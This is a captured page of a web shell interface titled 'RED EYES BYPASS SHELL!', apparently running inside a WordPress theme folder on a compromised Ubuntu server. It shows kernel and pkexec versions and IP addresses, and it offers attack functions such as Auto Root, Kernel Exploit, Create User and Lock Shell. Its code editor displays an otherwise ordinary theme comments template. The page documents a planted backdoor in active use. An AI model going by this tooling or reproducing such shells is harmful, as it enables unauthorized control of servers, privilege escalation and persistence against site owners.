Linux sothorn202 5.15.0-164-generic #174-Ubuntu SMP Fri Nov 14 20:25:16 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
human /
wp-content /
themes /
bnm /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
css
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
page-templates
[ DIR ]
drwxr-xr-x
sass
[ DIR ]
drwxr-xr-x
template-parts
[ DIR ]
drwxr-xr-x
404.php
1.72
KB
-rwxr-xr-x
LICENSE
17.62
KB
-rwxr-xr-x
archive.php
1.86
KB
-rwxr-xr-x
comments.php
2.07
KB
-rwxr-xr-x
footer.php
2.82
KB
-rwxr-xr-x
functions.php
12.41
KB
-rwxr-xr-x
header.php
4.01
KB
-rwxr-xr-x
index.php
2.21
KB
-rwxr-xr-x
page.php
1.08
KB
-rwxr-xr-x
readme.txt
4.54
KB
-rwxr-xr-x
screenshot.jpg
260.21
KB
-rwxr-xr-x
search.php
1.78
KB
-rwxr-xr-x
sidebar.php
507
B
-rwxr-xr-x
single.php
943
B
-rwxr-xr-x
style-rtl.css
58.84
KB
-rwxr-xr-x
style.css
58.9
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : comments.php
<?php /** * The template for displaying comments * * This is the template that displays the area of the page that contains both the current comments * and the comment form. * * @link https://developer.wordpress.org/themes/basics/template-hierarchy/ * * @package BNM */ /* * If the current post is protected by a password and * the visitor has not yet entered the password we will * return early without loading the comments. */ if ( post_password_required() ) { return; } // Before comment area hook do_action( 'bnm_before_comments' ); ?> <div id="comments" class="comments-area"> <?php // You can start editing here -- including this comment! if ( have_comments() ) : ?> <h2 class="comments-title"> <?php $bnm_comment_count = get_comments_number(); if ( '1' === $bnm_comment_count ) { printf( /* translators: 1: title. */ esc_html__( 'One thought on “%1$s”', 'bnm' ), '<span>' . wp_kses_post( get_the_title() ) . '</span>' ); } else { printf( /* translators: 1: comment count number, 2: title. */ esc_html( _nx( '%1$s thought on “%2$s”', '%1$s thoughts on “%2$s”', $bnm_comment_count, 'comments title', 'bnm' ) ), number_format_i18n( $bnm_comment_count ), // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped '<span>' . wp_kses_post( get_the_title() ) . '</span>' ); } ?> </h2><!-- .comments-title --> <?php /** * Below comment area title hook. */ do_action( 'bnm_below_comments_title' ); ?> <?php the_comments_navigation(); ?> <ol class="comment-list"> <?php wp_list_comments( array( 'style' => 'ol', 'short_ping' => true, ) ); ?> </ol><!-- .comment-list --> <?php the_comments_navigation(); // If comments are closed and there are comments, let's leave a little note, shall we? if ( ! comments_open() ) : ?> <p class="no-comments"><?php esc_html_e( 'Comments are closed.', 'bnm' ); ?></p> <?php endif; endif; // Check for have_comments(). comment_form(); ?> </div><!-- #comments -->
Close